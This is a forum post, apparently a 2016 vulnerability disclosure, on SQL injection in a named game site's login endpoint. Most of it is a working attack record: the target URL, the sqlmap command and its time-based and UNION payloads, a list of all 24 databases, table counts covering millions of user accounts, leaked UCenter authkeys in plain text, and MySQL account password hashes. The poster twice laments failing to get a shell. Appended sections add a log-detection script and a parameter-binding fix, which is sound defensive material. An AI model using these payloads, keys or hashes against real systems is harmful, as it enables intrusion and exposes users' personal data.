HanDs
Administrator

[July vulnerability disclosure] Game security: SQL injection on the Huanchang Games (欢畅游戏) official site / affects the phone numbers, e-mail addresses, account names and passwords of 6 million players
Couldn't get a shell, so sad.

Detailed description:

There is an injection point when logging into the game; it is UNION-exploitable.

Code:
http://long.gamebean.com/game_enter.php?s_id=1



Run sqlmap

Code:
sqlmap -u 'http://long.gamebean.com/game_enter.php?s_id=1' --dbs
_
___ ___| |_____ ___ ___ {1.0.4.4#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:59:19

[09:59:19] [INFO] resuming back-end DBMS 'mysql'
[09:59:20] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.gamebean.com/login.php?ref=long.gamebean.com/dnslist.php'. Do you want to follow? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s_id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))OztZ) AND 'RdBD'='RdBD

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: s_id=-8227' UNION ALL SELECT CONCAT(0x716a6b6a71,0x78514469644943624c58794a73766a6954436456654979657a6e6658516564716145435362735458,0x71626a7171),NULL-- -
---
[09:59:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.12
[09:59:23] [INFO] fetching database names
[09:59:23] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] analyze
[*] android
[*] bbs
[*] cjsh_user
[*] cms
[*] dx
[*] football
[*] game_stat
[*] gcenter
[*] gs
[*] information_schema
[*] lt_wap
[*] mis
[*] mysql
[*] ourpalm
[*] ssfee_platform
[*] ssfee_platform_test
[*] test
[*] test_channel
[*] union
[*] user
[*] user2406
[*] webpay
[*] yjws
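The sqlmap session above leaves two distinctive traces in the web server's access log: a time-based `SLEEP()` probe with the sqlmap User-Agent, and a `UNION ALL SELECT` carrying a long hex marker literal. The following Python is an added example, not part of the original report or of any of the site's code, showing how a defender can scan nginx combined-format log lines for exactly those shapes. The four log lines are constructed for the demo (the IPs, timestamps and sizes are invented); only the payload shapes mirror what sqlmap printed above.

```python
import re
from urllib.parse import unquote_plus

# Constructed nginx "combined"-format access-log lines for illustration only
# (not taken from the page). Lines 2 and 3 carry the shapes of the two payloads
# sqlmap reported above (time-based SLEEP, and a UNION with a hex marker);
# the other two are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jul/2016:09:59:20 +0800] "GET /game_enter.php?s_id=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jul/2016:09:59:21 +0800] "GET /game_enter.php?s_id=1%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29OztZ%29%20AND%20%27RdBD%27%3D%27RdBD HTTP/1.1" 200 512 "-" "sqlmap/1.0.4.4#dev (http://sqlmap.org)"
10.0.0.5 - - [14/Jul/2016:09:59:22 +0800] "GET /game_enter.php?s_id=-8227%27%20UNION%20ALL%20SELECT%20CONCAT%280x716a6b6a71%2CNULL%29%2CNULL--%20- HTTP/1.1" 200 733 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Jul/2016:10:01:02 +0800] "GET /game_enter.php?s_id=42 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# One nginx/Apache "combined" log line.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Signatures applied to the URL-decoded query string. Each corresponds to
# something visible in the sqlmap session above.
QUERY_RULES = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("time_based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{8,}\b", re.I)),
]


def decode_query(target):
    """Return the URL-decoded query string of a request target ('' if none)."""
    if "?" not in target:
        return ""
    return unquote_plus(target.split("?", 1)[1])


def classify(decoded_query, user_agent):
    """Return the sorted list of rule names that fire for one request."""
    hits = [name for name, rx in QUERY_RULES if rx.search(decoded_query)]
    if user_agent.lower().startswith("sqlmap"):
        hits.append("sqlmap_ua")
    return sorted(hits)


def scan_access_log(text):
    """Scan raw log text; return one finding dict per suspicious request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        decoded = decode_query(m.group("target"))
        rules = classify(decoded, m.group("ua"))
        if rules:
            findings.append({
                "line": lineno,
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "query": decoded,
                "rules": rules,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['ip']} {f['rules']}: {f['query']}")
```

Decoding the query string before matching matters: sqlmap sends the payload percent-encoded, so a rule run on the raw request line would miss `SLEEP(` and `UNION`. The rule set is deliberately narrow (UNION with SELECT, timing functions, long hex literals, the sqlmap User-Agent) to keep false positives low on a game site whose normal parameters are short numeric ids.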

All 24 databases on the site are affected.

Proof of vulnerability:

Among them, the bbs database, the user database and the ssfee_platform (promotion platform) database hold 2 million + 4.5 million + 5.6 million records of user account names, passwords, phone numbers and e-mail addresses; after de-duplication that is roughly 6 million users.

Code:
Database: bbs
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| uc_memberfields | 1980846 |
| uc_members | 1980846 |
| cdb_favoritethreads | 46470 |
| cdb_prompt | 21412 |
| cdb_memberfields | 18489 |
| cdb_members | 18488 |
| cdb_posts | 9945 |
| cdb_onlinetime | 8183 |
| cdb_threads | 3357 |
| uchome_creditlog | 1660 |
| cdb_promptmsgs | 1321 |
| uchome_pic | 1320 |
| uchome_tagblog | 1118 |
| uc_pms | 1095 |
| cdb_threadsmod | 709 |
| cdb_modworks | 666 |
| cdb_rsscaches | 651 |
| uchome_blog | 502 |
| uchome_blogfield | 502 |
| uchome_member | 483 |
| uchome_space | 483 |
| uchome_spacefield | 483 |
| uchome_album | 464 |
| uchome_feed | 425 |
| cdb_threadtags | 340 |
| uchome_spaceinfo | 320 |
| cdb_stylevars | 282 |
| uchome_stat | 245 |
| cdb_settings | 244 |
| cdb_tags | 243 |
| uchome_tag | 209 |
| uchome_friend | 126 |
| uchome_usertask | 96 |
| cdb_smilies | 80 |
| cdb_statvars | 73 |
| uc_newpm | 66 |
| cdb_typeoptions | 65 |
| uchome_notification | 65 |
| uchome_config | 64 |
| uchome_comment | 62 |
| cdb_forumfields | 55 |
| cdb_forums | 55 |
| cdb_stats | 52 |
| uchome_creditrule | 47 |
| cdb_spacecaches | 42 |
| cdb_caches | 41 |
| uc_notelist | 38 |
| cdb_faqs | 34 |
| uchome_visitor | 32 |
| cdb_request | 30 |
| uc_friends | 29 |
| cdb_debateposts | 28 |
| cdb_favorites | 28 |
| cdb_favoriteforums | 25 |
| uchome_magic | 25 |
| cdb_magiclog | 24 |
| uc_settings | 24 |
| uchome_doing | 24 |
| uchome_magicstore | 24 |
| uchome_poke | 22 |
| uchome_magicinlog | 21 |
| uchome_post | 21 |
| uchome_usermagic | 21 |
| uchome_polloption | 20 |
| uchome_thread | 20 |
| cdb_usergroups | 19 |
| cdb_failedlogins | 18 |
| uchome_share | 18 |
| cdb_moderators | 17 |
| uchome_click | 15 |
| cdb_ratelog | 14 |
| cdb_taskvars | 14 |
| cdb_crons | 12 |
| cdb_forumlinks | 12 |
| cdb_magics | 12 |
| cdb_projects | 11 |
| cdb_reportlog | 11 |
| uchome_magicuselog | 10 |
| cdb_words | 9 |
| uchome_usergroup | 9 |
| cdb_admingroups | 7 |
| cdb_polloptions | 7 |
| cdb_tasks | 7 |
| uchome_task | 7 |
| cdb_access | 6 |
| cdb_feeds | 6 |
| cdb_prompttype | 6 |
| cdb_styles | 6 |
| cdb_templates | 6 |
| uchome_eventclass | 6 |
| uchome_mtag | 6 |
| uchome_polluser | 6 |
| uchome_tagspace | 6 |
| cdb_attachments | 5 |
| cdb_navs | 5 |
| cdb_ranks | 5 |
| uchome_cron | 5 |
| cdb_admincustom | 4 |
| cdb_bbcodes | 4 |
| cdb_onlinelist | 4 |
| cdb_searchindex | 4 |
| cdb_typemodels | 4 |
| uchome_data | 4 |
| uchome_poll | 4 |
| uchome_pollfield | 4 |
| cdb_imagetypes | 3 |
| cdb_warnings | 3 |
| uc_applications | 3 |
| uchome_class | 3 |
| uchome_profield | 3 |
| uchome_report | 3 |
| uchome_statuser | 3 |
| cdb_addons | 2 |
| cdb_debates | 2 |
| cdb_polls | 2 |
| cdb_adminactions | 1 |
| cdb_adminsessions | 1 |
| cdb_attachmentfields | 1 |
| uc_admins | 1 |
| uc_failedlogins | 1 |
| uc_protectedmembers | 1 |
+----------------------+---------+

Code:
Database: user
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| channel_extend | 12501938 |
| members_info | 4550839 |
| members_0 | 650074 |
| members_6 | 648069 |
| members_4 | 647573 |
| members_8 | 646946 |
| members_2 | 646486 |
| members_7 | 640523 |
| members_5 | 640124 |
| members_3 | 638772 |
| members_1 | 638475 |
| members_9 | 638271 |
| members_football | 66598 |
| membersinfo_0 | 29646 |
| membersinfo_6 | 29350 |
| membersinfo_4 | 29293 |
| membersinfo_5 | 29186 |
| membersinfo_2 | 29133 |
| membersinfo_8 | 29063 |
| membersinfo_3 | 28919 |
| membersinfo_7 | 28804 |
| membersinfo_1 | 28781 |
| membersinfo_9 | 28705 |
| footballuser_copy1 | 21563 |
| members_point | 20073 |
| members_fmworlds | 5047 |
| zq_point | 2703 |
| a | 1355 |
| footballuser | 1000 |
| invite | 25 |
| partner | 11 |
+--------------------+---------+

Code:
Database: ssfee_platform
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| p_user_ip | 6538408 |
| user_info_201112 | 5643243 |
| user_info | 3971775 |
| p_area | 2869631 |
| advt_stat_hour_201201TO06 | 2474046 |
| user_info_201102 | 2234956 |
| register_after | 1738043 |
| advt_stat_hour | 1559224 |
| advt_stat_channel | 1082289 |
| advt_stat_hour_201101TO07 | 1069454 |
| u_ip | 376052 |
| advt_stat_hour_201101TO02 | 344281 |
| jiaose_sssg | 186520 |
| temp4 | 139504 |
| advt_stat_ye | 117002 |
| advt_stat_hour_20108TO10 | 101229 |
| p_area_Integration | 57078 |
| temp2 | 56822 |
| p_newsbase_201206 | 49845 |
| p_ip | 45309 |
| advt_stat_nq | 43122 |
| p_area_Integration_ip | 25881 |
| seek_gateway_fee | 24020 |
| p_area_register | 21292 |
| seek_gateway_fee_bak | 19978 |
| wapgame_zhuce | 19034 |
| jiaose_long | 16060 |
| user_info_mj | 11834 |
| sms_fee | 7404 |
| temp3 | 4679 |
| get_user | 4035 |
| wapgame_fee | 3921 |
| wapgame_fee_bak | 3626 |
| p_newsbase_tmp | 3421 |
| pc_jiaose | 3134 |
| user_stat | 2809 |
| p_ad_info | 2590 |
| seek_gateway_chengben | 2381 |
| seek_gateway_chengben_bak | 2368 |
| p_user_ip_copy | 2355 |
| wapgame_fee_201109 | 2355 |
| sms_fee1 | 1772 |
| jiaose_yan | 1096 |
| p_newscontent | 966 |
| wapgame_zhuce_tmp | 927 |
| p_ad | 895 |
| p_area_Integration_copy | 742 |
| lm_info | 704 |
| p_newsbase | 665 |
| haoduan_ds | 345 |
| bd | 295 |
| bd2 | 295 |
| lm_info_test | 288 |
| netgame_stat | 243 |
| temp | 216 |
| seek_gateway_fee_tmp1 | 154 |
| p_area_Integration_ip_copy2 | 132 |
| p_area_Integration_ip_copy1 | 118 |
| p_area_Integration_ip_ddd | 118 |
| p_area_Integration_test_copy1 | 116 |
| baidu | 112 |
| wapgame_fee_tmp | 101 |
| p_user_ip_are | 99 |
| seek_gateway_fee_g9 | 92 |
| kuapintai_fee | 91 |
| jiaose_ly | 70 |
| u_manage | 68 |
| advt_stat_tmp | 62 |
| seek_gateway_fee_tmp | 62 |
| seek_gateway_fee_lr | 60 |
| u_admin | 60 |
| netgame_stat_tmp | 49 |
| sms_fee2 | 48 |
| p_area_Integration_ip_copy | 36 |
| sms_fee3 | 24 |
| seek_gateway_chengben_lr | 17 |
| u_group | 15 |
| seek_gateway_chengben_tmp | 14 |
| wapgame_fee_bf2015 | 12 |
| p_user_ip_tmp | 10 |
| data_manage | 9 |
| p_newsclass | 9 |
| wapgame_qudao | 9 |
| p_admin | 6 |
| p_area_Integration_test_copy | 6 |
| seek_gateway_xz | 6 |
| data_admin | 4 |
| jiaose_djh | 4 |
| yuan | 4 |
| data_group | 2 |
| p_adver_admin | 2 |
| ios_xml | 1 |
| p_config | 1 |
+-------------------------------+---------+

It also leaks the Discuz UCenter key (uckey):

Code:
Database: bbs
Table: uc_applications
[3 entries]
+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| appid | ip | url | name | type | extra | charset | authkey | recvnote | synlogin | dbcharset | viewprourl | apifilename | tagtemplates |
+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | <blank> | http://219.232.240.2/home | 个人家园 | UCHOME | <blank> | utf-8 | F0q1C5wclbJcieF6i6F03d3eDd37V4K10aG6y5I7qeEd97mcN3b3t43a21UfGai6 | 1 | 1 | utf8 | <blank> | uc.php | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[<a href="{url}" target="_blank">{subject}</a>]]></item>\r\n <item id="fields">\r\n <item id="subject"><![CDATA[日志标题]]></item>\r\n <item id="uid"><![CDATA[用户 ID]]></item>\r\n <item id="username"><![CDATA[用户名]]></item>\r\n <item id="dateline"><![CDATA[日期]]></item>\r\n <item id="spaceurl"><![CDATA[空间地址]]></item>\r\n <item id="url"><![CDATA[日志地址]]></item>\r\n </item>\r\n</root> |
| 2 | <blank> | http://219.232.240.2/bbs | Discuz! | DISCUZ | <blank> | utf-8 | P221cb87c9h7a0s7v8b533eeL0X939dfQ9uc16K7b4Ieh6U1Wbg0X2h3K3S854v4 | 1 | 1 | utf8 | <blank> | uc.php | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[<a href="{url}" target="_blank">{subject}</a>]]></item>\r\n <item id="fields">\r\n <item id="subject"><![CDATA[标题]]></item>\r\n <item id="uid"><![CDATA[用户 ID]]></item>\r\n <item id="username"><![CDATA[发帖者]]></item>\r\n <item id="dateline"><![CDATA[日期]]></item>\r\n <item id="url"><![CDATA[主题地址]]></item>\r\n </item>\r\n</root> |
| 3 | <blank> | http://www.gamebean.com | gamebean门户 | OTHER | a:1:{s:7:"apppath";s:0:"";} | <blank> | b1f3g6Fp/bNb5b5yiaD0/DlK2j4ZoEv5FxmjqvbMU4uHv/6+Xj2l9pU | 0 | 0 | <blank> | <blank> | uc.php | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[]]></item>\r\n</root> |
+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Couldn't get a shell.

Database passwords:

Code:
Database: mysql
Table: user
[39 entries]
+--------------+-------------------------------------------+---------------+
| user | password | host |
+--------------+-------------------------------------------+---------------+
| root | *4B40B8C66CD7F7380E398A0CEBE5C6F388DD2995 | localhost |
| admin | *3BD10CEA2A23736837BB5F0EDF1A80DC5EE4B91A | 127.0.0.1 |
| root | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | % |mysql228
| cctv | *9B91D3DD2A6DF0D4BD53BB9716EA231BE173D7B2 | % |
| channel | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | % |mysql228
| rsync | *B8275A0D97CC0A636920525D16CD8F2FFE137971 | % |
| test | *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29 | % |
| gamebean | *9D7CD5A312DB9732C250F6009DC97C4027846EDD | % |
| wapgame | *028E35F5FDD9A172849C808EBE9A45938A3571E4 | % |
| slave | *093D835F112A3BCBA1C39EFEFD1ADF934EEB2C8A | % |
| repl | *3028A46C5F893BB70BFAA40E5F0C90F8BAD8E07A | % |
| bbs | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | % |mysql228
| cms | *0DBB9DEC9800F895124E2D292E12D2CBE5565C58 | % |
| huawb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % |
| wangdy | *BE0BC36D760FFE1627F567894CE8EA4F692E819A | % |
| huawbtg | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % |
| zuol | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % |
| backup | *1827DC630AAEB1E997DB2B212CC94EFD9C431555 | 114.112.69.51 |
| huawb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.203 |
| huawb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.201 |
| huawbtg | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.201 |
| huawbtg | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.203 |
| dbbackup | *B8EA50B347976D08DBA6AFF751926429A04881EF | 172.16.% |
| wangyf | *4BE66E5176633B8101188EE0272832E033EA48F1 | % |
| bxb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % |
| gamebean_web | *54D36154FCBD065DFE7269E85C135EDB0DC715B8 | 219.232.240.2 |
| root_backup | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | 172.16.10.88 |mysql228
| qingjingli | *773E83E4FDE66994A6E5A4948E27332A199A157E | % |
| backup | *3584A73767611418363012358FAFC887749A25E7 | 113.31.91.159 |
| admin | *3BD10CEA2A23736837BB5F0EDF1A80DC5EE4B91A | localhost |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 172.16.108.% |
| mysqld | *B3500AC7C3F7205937036E78E40C103832F68BE6 | localhost |
| dbbackup | *B8EA50B347976D08DBA6AFF751926429A04881EF | 127.0.0.1 |
| root | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | 127.0.0.1 |mysql228
| dbbackup | *B8EA50B347976D08DBA6AFF751926429A04881EF | % |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 219.232.240.6 |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 219.232.240.2 |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 113.31.91.159 |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | % |
+--------------+-------------------------------------------+---------------+

Couldn't find the server IP.

Still couldn't get a shell, sigh.

Fix:

Filter SQL input.
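"Filter SQL input" is the right direction, but the fix that actually closes an injection like the one in `game_enter.php?s_id=` is to stop building the query from strings at all: check that `s_id` is the integer it is supposed to be, then pass it as a bound parameter. The block below is an added example, not code from the report or from the site; the site runs PHP and MySQL, whereas this demo uses Python with an in-memory SQLite database and a constructed `games`/`members` schema (the table names, rows and hashes are invented) so that the vulnerable handler and the hardened one can be run side by side. The injected value has the same shape as the page's UNION payload (close the quote, UNION two columns from another table, comment out the tail).

```python
import re
import sqlite3

# Constructed demo data, not the site's real schema: a game list keyed by s_id
# and a members table standing in for the user/bbs tables dumped above.
GAMES = [(1, "long"), (2, "football")]
MEMBERS = [("alice", "*CONSTRUCTED_HASH_A"), ("bob", "*CONSTRUCTED_HASH_B")]

# Same shape as the page's UNION payload: close the quote, UNION two columns
# from another table, comment out whatever follows.
INJECTED_S_ID = "-1' UNION ALL SELECT username, password_hash FROM members-- -"


def make_demo_db():
    """Build the in-memory demo database (constructed data, see above)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE games (s_id INTEGER PRIMARY KEY, name TEXT);"
        "CREATE TABLE members (username TEXT, password_hash TEXT);"
    )
    conn.executemany("INSERT INTO games VALUES (?, ?)", GAMES)
    conn.executemany("INSERT INTO members VALUES (?, ?)", MEMBERS)
    conn.commit()
    return conn


def enter_game_vulnerable(conn, s_id):
    """The defect: the request value is pasted into the SQL text, so a quote
    in s_id ends the literal and the rest of the value is parsed as SQL."""
    sql = "SELECT s_id, name FROM games WHERE s_id = '%s'" % s_id
    return conn.execute(sql).fetchall()


def lookup_with_binding(conn, s_id):
    """Parameter binding alone: the value is sent to the engine as data and is
    never parsed as SQL, so the UNION text is just a string that matches nothing."""
    return conn.execute(
        "SELECT s_id, name FROM games WHERE s_id = ?", (s_id,)
    ).fetchall()


def enter_game_safe(conn, raw_s_id):
    """Hardened handler: whitelist the type first (s_id is a numeric id), then
    bind. Returns None for anything that is not a decimal integer, which is the
    'filter' the report asks for, expressed as a positive allow-list."""
    if not re.fullmatch(r"-?\d+", str(raw_s_id)):
        return None
    return lookup_with_binding(conn, int(raw_s_id))


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable, normal id :", enter_game_vulnerable(db, "1"))
    print("vulnerable, injected  :", enter_game_vulnerable(db, INJECTED_S_ID))
    print("bound only, injected  :", lookup_with_binding(db, INJECTED_S_ID))
    print("safe, injected        :", enter_game_safe(db, INJECTED_S_ID))
```

Running it shows the whole problem in three lines: the formatted query returns the `members` rows for the injected value, the bound query returns nothing for the same value, and the validated handler rejects it before any SQL runs. In PHP the equivalent is `PDO::prepare()` with a `?` placeholder (or `mysqli_stmt_bind_param`) plus an `is_numeric`/`(int)` check on `s_id`; the principle is the same in any language. Defence in depth for the data this report exposes would also mean a web-only MySQL account that cannot read `mysql.user` or the other 23 databases, and salted slow hashes instead of the raw `*...` MySQL-style hashes shown above.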

Posted: 2016-7-14 | Views: 0 | Replies: 0